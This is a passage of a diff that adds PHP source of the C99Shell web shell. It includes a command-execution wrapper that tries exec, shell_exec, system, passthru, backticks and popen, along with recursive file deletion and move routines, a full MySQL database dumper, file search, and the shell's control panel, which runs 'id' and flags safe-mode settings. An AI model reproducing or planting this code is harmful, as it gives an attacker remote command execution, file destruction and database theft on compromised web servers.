+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return false;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = true;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return false;}
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1,1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{ 
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec")) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (is_callable("shell_exec")) {$result = shell_exec($cmd);}
+  elseif (is_callable("system")) {@ob_start(); system($cmd); $result = @ob_get_contents(); @ob_end_clean();}
+  elseif (is_callable("passthru")) {@ob_start(); passthru($cmd); $result = @ob_get_contents(); @ob_end_clean();}
+  elseif (($result = `$cmd`) !== false) {}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort"))
+{
+ function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400) ? "r" : "-"; 
+ $owner["write"] = ($mode & 00200) ? "w" : "-"; 
+ $owner["execute"] = ($mode & 00100) ? "x" : "-"; 
+ $group["read"] = ($mode & 00040) ? "r" : "-"; 
+ $group["write"] = ($mode & 00020) ? "w" : "-"; 
+ $group["execute"] = ($mode & 00010) ? "x" : "-"; 
+ $world["read"] = ($mode & 00004) ? "r" : "-"; 
+ $world["write"] = ($mode & 00002) ? "w" : "-"; 
+ $world["execute"] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner["execute"] = ($owner["execute"] == "x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group["execute"] = ($group["execute"] == "x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world["execute"] = ($world["execute"] == "x") ? "t" : "T";}
+
+ return $type.$owner["read"].$owner["write"].$owner["execute"].
+        $group["read"].$group["write"].$group["execute"].
+        $world["read"].$world["write"].$world["execute"];
+}
+}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=\"red\">".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=\"white\">".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=\"green\">".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($c99sh_updatefurl."?version=".$shver."&");
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  elseif ($shver < $data["cur"]) {$updatenow = true;}
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $SERVER_ADDR = getenv("SERVER_ADDR");
+ $SERVER_NAME = getenv("SERVER_NAME");
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql;
+     } 
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form action=\"".$sql_surl."\" name=\"c99sh_sqlquery\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return false;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== false)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = getenv("SystemRoot");}
+}
+else {$tmpdir = realpath($tmpdir);}
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1,1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF	
+@ini_set("highlight.comment",$highlight_comment); //#FF8000	
+@ini_set("highlight.default",$highlight_default); //#0000BB	
+@ini_set("highlight.html",$highlight_html); //#000000	
+@ini_set("highlight.keyword",$highlight_keyword); //#007700	
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><link rel="shortcut icon" href="" type="image/x-icon"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,strlen($d)-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=\"green\">[ ok ]</font>";
+ echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=\"red\">[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === false) {$free = 0;}
+ if ($total === false) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\\\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=\"green\">".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+?></p></td></tr></table><br><?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php }
+?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
